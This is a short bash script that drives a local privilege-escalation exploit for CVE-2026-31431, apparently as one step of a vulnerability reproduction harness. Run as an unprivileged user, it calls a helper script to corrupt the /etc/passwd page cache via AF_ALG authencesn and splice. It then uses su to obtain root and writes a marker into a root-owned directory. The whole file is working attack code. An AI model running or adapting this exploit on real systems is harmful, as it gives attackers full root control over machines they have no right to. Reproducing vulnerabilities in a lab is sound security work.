#!/usr/bin/env bash
# Runs ON the VM AS the unprivileged actor (lowpriv). Drives the
# CVE-2026-31431 page-cache write primitive to corrupt /etc/passwd, then uses
# the resulting UID-0 identity to perform a root-only action (write a marker
# into a root-owned directory). Does NOT verify success.
set -u

USER_NAME="${1:?usage: escalate.sh <user> <marker_dir> <marker_name>}"
MARKER_DIR="${2:?marker dir required}"
MARKER_NAME="${3:?marker name required}"
HERE="$(cd "$(dirname "$0")" && pwd)"

echo "[*] actor identity before exploit:"
id

echo "[*] corrupting /etc/passwd page cache via AF_ALG authencesn + splice ..."
python3 "$HERE/passwd_patch.py" "$USER_NAME"

echo "[*] /etc/passwd now resolves $USER_NAME as:"
getent passwd "$USER_NAME" || true

# su sees the caller's uid (now 0 per the corrupted passwd page cache) and
# skips authentication; the resulting shell has REAL uid 0 credentials.
echo "[*] escalating via su and writing root-owned marker ..."
su "$USER_NAME" -c "id; echo 'created-by-unprivileged-actor-via-CVE-2026-31431' > '$MARKER_DIR/$MARKER_NAME'; ls -l '$MARKER_DIR/$MARKER_NAME'" < /dev/null

echo "[*] done."